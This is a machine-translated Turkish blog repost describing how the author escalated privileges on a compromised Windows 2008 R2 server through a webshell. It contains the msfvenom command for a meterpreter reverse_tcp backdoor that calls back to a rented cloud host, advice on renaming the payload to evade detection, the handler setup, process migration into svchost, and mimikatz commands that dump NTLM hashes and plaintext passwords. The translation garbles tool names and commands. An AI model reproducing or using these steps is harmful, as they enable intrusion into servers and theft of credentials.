Dün gece, arkadaşım bir 08 r2 web kabuğu yayınladı ve sistem izinleriniz varsa bir hesap ekleyemez veya karma değeri yakalayamazsınız, bu nedenle aşağıdaki
Not: 08R2'nin sistem izni MS15-051 ile yükseltildi, yerel izin yükseltme EXPLOIT, söylenecek bir şey yok
Tencent Cloud'da saatte 5 sentlik bir bulut server kiraladım ve üzerine metasploit kurdum.Tencent Cloud'un nat ortamında public ve private adresleri olduğu için, ters backdoor yapmak istediğimiz kadar portları da haritalayabiliyoruz.
Yük oluştur
msfvenom -p windows / meterpreter / reverse_tcp LHOST = genel ağ ip LPORT = 2333 -f exe -o xx.exe
Daha sonra arka kapıyı kopyalayın ve web kabuğuna yükleyin. Biri öldürüleceği için exe sonekini kullanmamanız önerilir.İkincisi, exe'nin çalışması genellikle yasaktır.
Herhangi bir formata değiştirin ve webshell'e yükleyin, çünkü webshell'de çalışan herhangi bir format sunucu tarafından bir exe olarak yürütülebilir.
Ardından izleme modülü yükünü ayarlayın
msf > exploit / multi / handler kullan
msf exploit (işleyici) > yük pencereleri / meterpreter / reverse_tcp ayarla
payload = > windows / meterpreter / reverse_tcp
msf exploit (işleyici) > lport 2333 ayarla
lport = > 2333
msf exploit (işleyici) > lhost intranet IP'sini ayarla (nat ilişkisi)
lhost = > 10.104.142.160
msf exploit (işleyici) > sömürmek
10.104.142.160:2333'te ters TCP işleyicisi başlatıldı
Yük işleyiciyi başlatma ...
Meterpreter'ın arka kapı yürütme yetkisi yalnızca sunucu yürütme yetkilisiyle aynı olabileceğinden, sistem yetkisini elde etmek için ms15-051 tarafından alınan sistem yetkisiyle arka kapıyı çalıştırın.
Bu bir ölçüm cihazı oturumu alacak
Sistem izni olmasına rağmen, karma değer tahmininin neden hala bir izin sorunu olduğunu hala bilmiyorum.
Sonra, gerçek sistem izinlerini elde etmek için arka kapıyı pencerelerdeki bir sistem sürecine enjekte etmeyi düşündüm.
816 pid değerine sahip svchost.exe'nin bir sistem işlemi olduğuna bakın ve ardından geçiş yapmayı deneyin.
Taşıma işleminden sonra, izninizin olduğunu kanıtlamak için hash'i dışa aktarabilirsiniz, ancak yakalanan şifre gerçekten boştur. Önemli değil. Artefakt mimikazını çağırmayı deneyin.
ölçüm cihazı > mimikatz yükle
Uzantı mimikatz yükleniyor başarılı.
Meterpreter'ı çalıştır > mimikatz_command -f samdump :: hashler
NTLMhash'i ilk kez okuyun
Ölçüm cihazını ikinci kez çalıştır > mimikatz_command -f sekurlsa :: searchPasswords
Ardından, burada yatacak pencerelerin düz metnini görebilir, görmek için sunucuyu bağlayabilirsiniz.
Şifrenin doğru olduğunu kanıtlarsanız, sunucuya girmezsiniz
* Kaynak: Suzumiya Mottoin düzenlendi ve yayınlandıOrijinal makale, yazar: Moto, http: //www.mottoin.com/article/web/85907.html adresinden yeniden üretilmiştir.